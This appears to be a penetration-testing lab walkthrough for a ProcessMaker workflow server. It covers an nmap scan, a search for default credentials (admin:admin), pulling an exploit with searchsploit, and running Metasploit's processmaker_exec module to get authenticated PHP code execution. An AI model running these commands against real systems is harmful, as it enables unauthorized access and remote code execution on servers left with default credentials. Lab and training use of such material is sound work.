Workflow platform(Processmaker)

  • Exploit a vulnerable ProcessMaker server with Metasploit

nmap -sS -sV 10.2.27.1
80/tcp    open  http               Apache httpd 2.2.23 ((Win32) PHP/5.2.14)
135/tcp   open  msrpc              Microsoft Windows RPC
139/tcp   open  netbios-ssn        Microsoft Windows netbios-ssn
445/tcp   open  microsoft-ds       Microsoft Windows Server 2008 R2 - 2012 microsoft-ds
3306/tcp  open  mysql              MySQL (unauthorized)
3389/tcp  open  ssl/ms-wbt-server?
49152/tcp open  msrpc              Microsoft Windows RPC
49153/tcp open  msrpc              Microsoft Windows RPC
49154/tcp open  msrpc              Microsoft Windows RPC
49155/tcp open  msrpc              Microsoft Windows RPC
49156/tcp open  msrpc              Microsoft Windows RPC
Service Info: OSs: Windows, Windows Server 2008 R2 - 2012; CPE: cpe:/o:microsoft:windows

Enumeration

  • Explore the web application hosted on the web server, before running any vuln scanners

firefox 10.2.27.1

  • View the web page source code. In this case no version information can be found.

  • Search online for ProcessMaker default credentials

    • admin:admin

Exploitation

searchsploit ProcessMaker
# Try "ProcessMaker Open Source - (Authenticated) PHP Code Execution (Metasploit)"

cd Desktop
searchsploit -m 29325
less 29325.rb
rm 29325.rb
# In this case a Metasploit module will be used

service postgresql start && msfconsole -q
db_status
setg RHOSTS 10.2.27.1
setg RHOST 10.2.27.1
workspace -a ProcessMaker
search ProcessMaker
use exploit/multi/http/processmaker_exec
options
set USERNAME admin
set PASSWORD admin
run
PreviousMySQLNextSun GlassFish

Last updated